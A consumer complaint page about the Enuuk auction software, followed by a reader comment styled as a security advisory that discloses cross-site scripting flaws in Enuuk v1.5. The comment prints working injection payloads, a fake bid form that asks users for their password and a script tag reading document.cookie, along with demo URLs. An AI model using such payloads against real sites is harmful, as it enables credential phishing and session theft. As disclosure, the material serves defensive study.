Report: Enuuk

Reported By: The Numismatic Dealers Den ( )

USA

Enuuk PhpAuction Beware of the product Enuuk (auction software). The program is frought with bugs and the vendor will not refund your money unless you give them your domain name Internet

*Consumer Comment... Bugs on ENUUK

1Author 1Consumer 0Employee

Respond to this report!

Victim of this person/company?

Enuuk

www.numismaticdealers.net
Internet
United States of America
Phone:
Web Address:

Category: Computer Software

Submitted: Friday, September 18, 2009

Last posting: Sunday, November 22, 2009

In August my organization spend $945 to purchase Enuuk- what was advertised as a premier auction software soultion. From the day the software was istalled, there was nothing but bugs- big bugs. For instance, the software did not show the correct time remaining and members consistently got fatal error messages. The vendor then insisted that they upgrade it to the new version (which they released the day after I sent it 5 bugs notices). They upgraded it and still more bugs showed. They even send me an email saying another version was avialable and provided insutrctions on upgrading. That upgrade failed and more bugs showed. When I told them I had enough and I wated my money back, they told me that these bugs were my problem and they won't give me my money back unless I gave up my domain name- even though in the beginning we agreed that they would not ask for my domain name if the product was faulty. See www.enuuk.org for a complete list of the bugs that I have found. I have since needed resort calling and asking my credit card company to help. I am writing this in hopes others don't fall into the trap. They are either in Mexico or Spain so I have little other recourse other than that.

Click Here to read other Ripoff Reports on Enuuk

Search for additional reports

If you would like to see more Rip-off Reports on this company/individual, search here:

Search Tips

Respond to this report!

Victim of this person/company?

Repair Your Reputation

REBUTTALS & REPLIES:

1Author 1Consumer 0Employee

Consumer Comment

Respond to this report!

Bugs on ENUUK

roboteto - (United States of America)

SUBMITTED: Sunday, November 22, 2009 POSTED: Sunday, November 22, 2009

Roboteto Security Advisor's
=====================

XSS Attacks on ENUUK V 1.5
Input Validation Error on ENUUK, Cross Site Scripting on any auction.

Please see the demo on Sunday 22 de November
http://www.phpauction.net/enuuk-auction-platform/offer/details/8 (alternate form validator)
http://www.phpauction.net/enuuk-auction-platform/offer/details/7 (document.cookie)
http://www.phpauction.net/enuuk-auction-platform/ (alerts on nickname)

You can introduce any HTML tag on textareas (before disabling Javascript option on navigator).

You can put a form like this:
A hack to this website and all websites with ENUUK (without quotes):

<div>A hack to this website and all websites with ENUUK:

<div width=800 height=400 style=background-color:#faa>
<h3>To bid please, fill this form (please, be sure that is your password)</h3><br>
<form name=form method=get class=header-login action=http://www.phpauction.net/enuuk-auction-platform/offer/edit/8>
 User: <input name=login type=text><br><br>
 Password <input name=passwd type=password><br><br>
  <a class=button href=javascript:void() onclick=document.form.submit();>Bid this! <img src=themes/default/img/buttonArrow.gif></a><br><br>

</form>

</div>

You can introduce on any input form a <script> tag, that allows you to javascript injection:

Introduce your name: roboteto<script>alert(document.cookie);</script>

Author:
These vulnerabilities have been found and released without any damages for ENUUK or its customers by
Roboteto.
You can find me at roboteto[AT|NOSPAM]hotmail[DOT|NOTSPAM]es for securing your sites.

Sincerely,

Roboteto.